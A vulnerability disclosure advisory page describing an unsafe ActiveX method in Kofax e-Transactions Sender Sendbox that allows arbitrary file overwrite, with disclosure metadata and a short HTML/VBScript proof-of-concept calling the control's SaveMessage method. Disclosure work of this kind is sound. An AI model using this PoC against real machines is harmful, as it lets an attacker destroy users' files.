Stay in Touch

Application security insights and invitations to exclusive events in your inbox

Your data will stay confidential Private and Confidential

Kofax e-Transactions Sender Sendbox ActiveX Control Insecure Method

Advisory ID:HTB23016
Product:Kofax e-Transactions Sender Sendbox
Vendor:Kofax, Inc
Vulnerable Versions: and probably prior
Tested Version:
Advisory Publication:June 1, 2011 [without technical details]
Vendor Notification:June 1, 2011
Public Disclosure:June 22, 2011
Vulnerability Type:Exposed Unsafe ActiveX Method [CWE-618]
Risk Level:Critical
CVSSv2 Base Score:10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Kofax e-Transactions Sender Sendbox, which can be exploited to overwrite arbitrary files.

1) Insecure method in Kofax e-Transactions Sender Sendbox ActiveX Control
The vulnerability is caused due to the LEADeMail.LEADSmtp.20 (LTCML14n.dll ( ActiveX control including the insecure "SaveMessage()" method. This can be exploited to overwrite with junk data arbitrary files in the context of the currently logged-on user.
The following PoC code is available:
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
target.SaveMessage arg1 ,arg2
End Sub

ImmuniWeb® On-Demand Web Application Penetration Test

Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.

[1] High-Tech Bridge Advisory HTB23016 - - Kofax e-Transactions Sender Sendbox ActiveX Control Insecure Method
[2] Kofax e-Transactions - - Kofax e-Transactions is an add-on application for Kofax Transformation Modules that automates the electronic delivery of documents to a business process via secure email, removing the need for printing, mailing, scanning and data entry.
[3] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
User Comments
Add Comment

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Quick Start
Free Trial